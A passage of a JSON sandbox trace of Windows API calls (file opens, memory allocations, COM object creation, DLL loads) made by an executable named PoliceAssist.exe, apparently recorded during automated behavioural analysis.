}, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 24 }, { "timestamp": "2025-11-20 10:58:28,400", "thread_id": "2768", "caller": "0x7ff73603ddb7", "parentcaller": "0x7ff73603c5b7", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x40000003", "arguments": [ { "name": "SectionHandle", "value": "0x000015bc" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x10dc0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0013a000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 25 }, { "timestamp": "2025-11-20 10:58:28,400", "thread_id": "2768", "caller": "0x7ff73603ddb7", "parentcaller": "0x7ff73603c5b7", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x10dc0000" }, { "name": "RegionSize", "value": "0x0013a000" } ], "repeated": 0, "id": 26 }, { "timestamp": "2025-11-20 10:58:28,400", "thread_id": "2768", "caller": "0x7ff735ffafc1", "parentcaller": "0x7ff73603de65", "category": "com", "api": "CoCreateInstanceEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917" }, { "name": "ClsContext", "value": "0x00000403", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "ServerName", "value": "" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 27 }, { "timestamp": "2025-11-20 10:58:31,838", "thread_id": "3512", "caller": "0x7ffee10bacfe", "parentcaller": "0x7ffee2f93b78", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "unload" }, { "name": "DllName", "value": "C:\\Windows\\System32\\ShellCommonCommonProxyStub" }, { "name": "DllBase", "value": "0x7ffecb1d0000" } ], "repeated": 0, "id": 28 }, { "timestamp": "2025-11-20 10:58:31,838", "thread_id": "3512", "caller": "0x7ffee34e0db0", "parentcaller": "0x7ffee34a0391", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffecb1d0000" }, { "name": "RegionSize", "value": "0x00001000" } ], "repeated": 0, "id": 29 }, { "timestamp": "2025-11-20 10:58:33,416", "thread_id": "3400", "caller": "0x7ffecd44e842", "parentcaller": "0x7ffee34e16e9", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000016b0" }, { "name": "DesiredAccess", "value": "0x00120089", "pretty_value": "FILE_GENERIC_READ" }, { "name": "FileName", "value": "\\Device\\Bam" }, { "name": "ShareAccess", "value": "7", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 30 }, { "timestamp": "2025-11-20 10:58:34,103", "thread_id": "2840", "caller": "0x7ffee347ed8a", "parentcaller": "0x7ffee3496068", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0aa18000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 31 }, { "timestamp": "2025-11-20 10:58:34,103", "thread_id": "2840", "caller": "0x7ffee347ed8a", "parentcaller": "0x7ffee34964ab", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0aa1b000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 32 }, { "timestamp": "2025-11-20 10:58:34,103", "thread_id": "2840", "caller": "0x7ffee347ed8a", "parentcaller": "0x7ffee34964ab", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0aa6b000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 33 }, { "timestamp": "2025-11-20 10:58:34,103", "thread_id": "2840", "caller": "0x7ffee347ed8a", "parentcaller": "0x7ffee3496068", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0aaa2000" }, { "name": "RegionSize", "value": "0x00009000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 34 }, { "timestamp": "2025-11-20 10:58:34,103", "thread_id": "2840", "caller": "0x7ffee347ed8a", "parentcaller": "0x7ffee34964ab", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0aaae000" }, { "name": "RegionSize", "value": "0x00006000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 35 }, { "timestamp": "2025-11-20 10:58:34,103", "thread_id": "2840", "caller": "0x7ffee347ed8a", "parentcaller": "0x7ffee3496068", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0913d000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 36 }, { "timestamp": "2025-11-20 10:58:34,103", "thread_id": "2840", "caller": "0x7ffee347ed8a", "parentcaller": "0x7ffee34964ab", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x09141000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 37 }, { "timestamp": "2025-11-20 10:58:34,103", "thread_id": "2840", "caller": "0x7ffee347ed8a", "parentcaller": "0x7ffee34964ab", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0912c000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 38 }, { "timestamp": "2025-11-20 10:58:35,619", "thread_id": "2768", "caller": "0x7ff7360422e2", "parentcaller": "0x7ff736042e19", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05edd000" }, { "name": "RegionSize", "value": "0x00008000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 39 }, { "timestamp": "2025-11-20 10:58:35,619", "thread_id": "2768", "caller": "0x7ff7360423a8", "parentcaller": "0x7ff736042e19", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000015c8" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Temp\\PoliceAssist.exe" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 40 }, { "timestamp": "2025-11-20 10:58:35,619", "thread_id": "2768", "caller": "0x7ff7360423a8", "parentcaller": "0x7ff736042e19", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00001c40" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x10dc0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0012f000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 41 }, { "timestamp": "2025-11-20 10:58:35,619", "thread_id": "2768", "caller": "0x7ff7360423a8", "parentcaller": "0x7ff736042e19", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x10dc0000" }, { "name": "RegionSize", "value": "0x0012f000" } ], "repeated": 0, "id": 42 }, { "timestamp": "2025-11-20 10:58:35,697", "thread_id": "2996", "caller": "0x7ff73601a297", "parentcaller": "0x7ff7361194e9", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0b300000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 43 }, { "timestamp": "2025-11-20 10:58:35,697", "thread_id": "2768", "caller": "0x00000000", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 44 }, { "timestamp": "2025-11-20 10:58:35,697", "thread_id": "3400", "caller": "0x7ff7360599ca", "parentcaller": "0x7ff73605a869", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B" }, { "name": "ClsContext", "value": "0x00000003", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER" }, { "name": "riid", "value": "DE25675A-72DE-44B4-9373-05170450C140" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 45 }, { "timestamp": "2025-11-20 10:58:35,697", "thread_id": "2996", "caller": "0x7ff73601ca89", "parentcaller": "0x7ff73601c93f", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000016b0" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\apppatch\\sysmain.sdb" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000080", "pretty_value": "FILE_ATTRIBUTE_NORMAL" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 46 }, { "timestamp": "2025-11-20 10:58:35,697", "thread_id": "2996", "caller": "0x7ff73601c67f", "parentcaller": "0x7ff73601c407", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00001cb0" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7df4df3f0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x003e3000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 47 }, { "timestamp": "2025-11-20 10:58:35,697", "thread_id": "3400", "caller": "0x7ff73605bdd2", "parentcaller": "0x7ff73605a52a", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000016f8" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\" }, { "name": "ShareAccess", "value": "7", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 48 }, { "timestamp": "2025-11-20 10:58:35,697", "thread_id": "3400", "caller": "0x7ff73605a552", "parentcaller": "0x7ff736059a4f", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 49 }, { "timestamp": "2025-11-20 10:58:35,697", "thread_id": "3400", "caller": "0x7ff73605a552", "parentcaller": "0x7ff736059a4f", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000016f8" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\" }, { "name": "ShareAccess", "value": "7", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 50 }, { "timestamp": "2025-11-20 10:58:35,697", "thread_id": "3400", "caller": "0x7ff73605a65f", "parentcaller": "0x7ff736059a4f", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 51 }, { "timestamp": "2025-11-20 10:58:35,697", "thread_id": "2996", "caller": "0x7ff73601a878", "parentcaller": "0x7ff73601a7ba", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7df4df3f0000" }, { "name": "RegionSize", "value": "0x003e3000" } ], "repeated": 0, "id": 52 }, { "timestamp": "2025-11-20 10:58:35,697", "thread_id": "3400", "caller": "0x7ff73605a65f", "parentcaller": "0x7ff736059a4f", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "4234D49B-0245-4DF3-B780-3893943456E1" }, { "name": "ClsContext", "value": "0x00000401", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "000214E6-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 53 }, { "timestamp": "2025-11-20 10:58:35,697", "thread_id": "3400", "caller": "0x7ff73605a65f", "parentcaller": "0x7ff736059a4f", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B" }, { "name": "ClsContext", "value": "0x00000003", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER" }, { "name": "riid", "value": "02C5CCF3-805F-4654-A7B7-340A74335365" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 54 }, { "timestamp": "2025-11-20 10:58:35,697", "thread_id": "2768", "caller": "0x7ff73605a06e", "parentcaller": "0x7ff736058f2b", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B" }, { "name": "ClsContext", "value": "0x00000003", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER" }, { "name": "riid", "value": "DE25675A-72DE-44B4-9373-05170450C140" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 55 }, { "timestamp": "2025-11-20 10:58:35,697", "thread_id": "2768", "caller": "0x7ff73605a0c1", "parentcaller": "0x7ff736058f2b", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 56 }, { "timestamp": "2025-11-20 10:58:35,697", "thread_id": "4072", "caller": "0x7ffee347ed8a", "parentcaller": "0x7ffee349db07", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x095a3000" }, { "name": "RegionSize", "value": "0x00004000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 57 }, { "timestamp": "2025-11-20 10:58:35,697", "thread_id": "2768", "caller": "0x7ff73602fdaf", "parentcaller": "0x7ff736032596", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0b327000" }, { "name": "RegionSize", "value": "0x0000c000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 58 }, { "timestamp": "2025-11-20 10:58:35,697", "thread_id": "4072", "caller": "0x7ffee10e3013", "parentcaller": "0x7ffecd49672b", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000017c8" }, { "name": "HandleName", "value": "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\GameDVR\\KnownGameList.bin" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x80\\xb1\\x04\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 59 }, { "timestamp": "2025-11-20 10:58:35,713", "thread_id": "2768", "caller": "0x7ff73602fdaf", "parentcaller": "0x7ff736032596", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0b2f8000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 60 }, { "timestamp": "2025-11-20 10:58:35,713", "thread_id": "4068", "caller": "0x7ffee347ed8a", "parentcaller": "0x7ffee349db07", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0b336000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 61 }, { "timestamp": "2025-11-20 10:58:35,713", "thread_id": "2768", "caller": "0x7ff7360735ec", "parentcaller": "0x7ff73603117e", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0b343000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 62 }, { "timestamp": "2025-11-20 10:58:35,713", "thread_id": "2768", "caller": "0x7ff73605a06e", "parentcaller": "0x7ff736046f8c", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B" }, { "name": "ClsContext", "value": "0x00000003", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER" }, { "name": "riid", "value": "DE25675A-72DE-44B4-9373-05170450C140" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 63 }, { "timestamp": "2025-11-20 10:58:35,713", "thread_id": "2768", "caller": "0x7ff73605a0c1", "parentcaller": "0x7ff736046f8c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 64 }, { "timestamp": "2025-11-20 10:58:35,728", "thread_id": "4032", "caller": "0x7ff736020b13", "parentcaller": "0x7ff736020a51", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0770f000" }, { "name": "RegionSize", "value": "0x00040000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 65 }, { "timestamp": "2025-11-20 10:58:35,728", "thread_id": "4032", "caller": "0x7ff736020b6a", "parentcaller": "0x7ff736020a51", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00001058" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Temp\\policeassist.exe" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 66 }, { "timestamp": "2025-11-20 10:58:35,728", "thread_id": "4032", "caller": "0x7ff736020b6a", "parentcaller": "0x7ff736020a51", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x40000003", "arguments": [ { "name": "SectionHandle", "value": "0x00000df4" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x10dc0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0013a000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 67 }, { "timestamp": "2025-11-20 10:58:35,728", "thread_id": "4032", "caller": "0x7ff736020b6a", "parentcaller": "0x7ff736020a51", "category": "filesystem", "api": "NtOpenFile", "status": false, "return": "0xffffffffc000003a", "pretty_return": "OBJECT_PATH_NOT_FOUND", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\SystemResources\\policeassist.exe.mun" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 68 }, { "timestamp": "2025-11-20 10:58:35,728", "thread_id": "4032", "caller": "0x7ff736020b6a", "parentcaller": "0x7ff736020a51", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x10dc0000" }, { "name": "RegionSize", "value": "0x0013a000" } ], "repeated": 0, "id": 69 }, { "timestamp": "2025-11-20 10:58:35,728", "thread_id": "4032", "caller": "0x7ff736020b6a", "parentcaller": "0x7ff736020a51", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00001ca4" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Temp\\policeassist.exe" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 70 }, { "timestamp": "2025-11-20 10:58:35,728", "thread_id": "4032", "caller": "0x7ff736020b6a", "parentcaller": "0x7ff736020a51", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x40000003", "arguments": [ { "name": "SectionHandle", "value": "0x00001cb0" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x10dc0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0013a000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 71 }, { "timestamp": "2025-11-20 10:58:35,728", "thread_id": "4032", "caller": "0x7ff736020b6a", "parentcaller": "0x7ff736020a51", "category": "filesystem", "api": "NtOpenFile", "status": false, "return": "0xffffffffc000003a", "pretty_return": "OBJECT_PATH_NOT_FOUND", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\SystemResources\\policeassist.exe.mun" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 72 }, { "timestamp": "2025-11-20 10:58:35,728", "thread_id": "4032", "caller": "0x7ff736020b6a", "parentcaller": "0x7ff736020a51", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x10dc0000" }, { "name": "RegionSize", "value": "0x0013a000" } ], "repeated": 0, "id": 73 }, { "timestamp": "2025-11-20 10:58:35,728", "thread_id": "4032", "caller": "0x7ff736020b6a", "parentcaller": "0x7ff736020a51", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x095b0000" }, { "name": "RegionSize", "value": "0x0001a000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 74 }, { "timestamp": "2025-11-20 10:58:35,744", "thread_id": "4032", "caller": "0x7ff736020b6a", "parentcaller": "0x7ff736020a51", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00001cb0" }, { "name": "DesiredAccess", "value": "0x00100000", "pretty_value": "SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\Explorer" }, { "name": "ShareAccess", "value": "0" } ], "repeated": 0, "id": 75 }, { "timestamp": "2025-11-20 10:58:35,744", "thread_id": "4032", "caller": "0x7ff736020b6a", "parentcaller": "0x7ff736020a51", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "317D06E8-5F24-433D-BDF7-79CE68D8ABC2" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "EC5EC8A9-C395-4314-9C77-54D7A935FF70" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 76 }, { "timestamp": "2025-11-20 10:58:35,744", "thread_id": "2768", "caller": "0x7ff73605a06e", "parentcaller": "0x7ff736046f8c", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B" }, { "name": "ClsContext", "value": "0x00000003", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER" }, { "name": "riid", "value": "DE25675A-72DE-44B4-9373-05170450C140" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 77 }, { "timestamp": "2025-11-20 10:58:35,744", "thread_id": "2768", "caller": "0x7ff73605a0c1", "parentcaller": "0x7ff736046f8c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 78 }, { "timestamp": "2025-11-20 10:58:35,744", "thread_id": "2768", "caller": "0x7ff73605a06e", "parentcaller": "0x7ff736046f8c", "category": "com", "api": "CoCreateInstance", "status": true, "return": 